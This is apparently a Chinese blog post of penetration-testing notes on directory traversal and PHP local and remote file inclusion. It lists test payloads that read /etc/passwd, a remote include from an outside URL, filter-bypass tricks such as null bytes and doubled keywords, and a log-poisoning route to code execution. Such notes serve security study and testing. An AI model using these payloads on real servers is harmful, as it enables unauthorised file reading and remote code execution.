目录遍历与文件包含

文件包含

LFI:本地文件包含
RFI:远程文件包含(allow_url_include = on)

1.特征

?include=a.php
?page=a.php
?home=a.html

2.经典测试方法

1.?file=../../../../etc/passwd(?file=/etc/passwd)
2.?page=file:///etc/passwd(绝对路径)
3.?page=http://www.a.com/1.php(远程文件包含)

3.绕过方法

绕过扩展名限制
?file=1.php%00.html

编码特殊字符
url编码、双层url编码
Unicode/UTF-8编码

其他
file.txt...
file.txt<spaces>
file.txt””””
file.txt<<<>>><
./././file.txt
nonexistant/../file.txt

过滤关键词
htthttp://p://

4.其他形式

通过post或cookie等方式提交路径

5.常用字典

/usr/share/wfuzz/wordlist/vulns/dirTraversal.txt

本地文件包含的利用

通过请求将php代码提交给服务器,然后包含服务器的日志文件
如/var/log/apache2/access.log (多数情况下www用户没有权限访问)
上传文件(如txt文件),被文件包含后其中的php代码将被执行

远程文件包含

目录遍历

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • php文件包含详细介绍
    一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来...
    喜欢吃栗子阅读 7,604评论 1 4
  • 文件包含漏洞详解
    http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过ph...
    查无此人asdasd阅读 6,182评论 0 2
  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,390评论 19 139
  • From:黑白之道
    一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 10,354评论 0 9
  • 【第11天打卡】
    听罗胖的市场经济,脑洞又开了一些。保守呆板的症结似乎找到了思想根源,一切的一切都以有发展为目标,才能不断向前进步。...
    e9723dc4e1c3阅读 923评论 0 1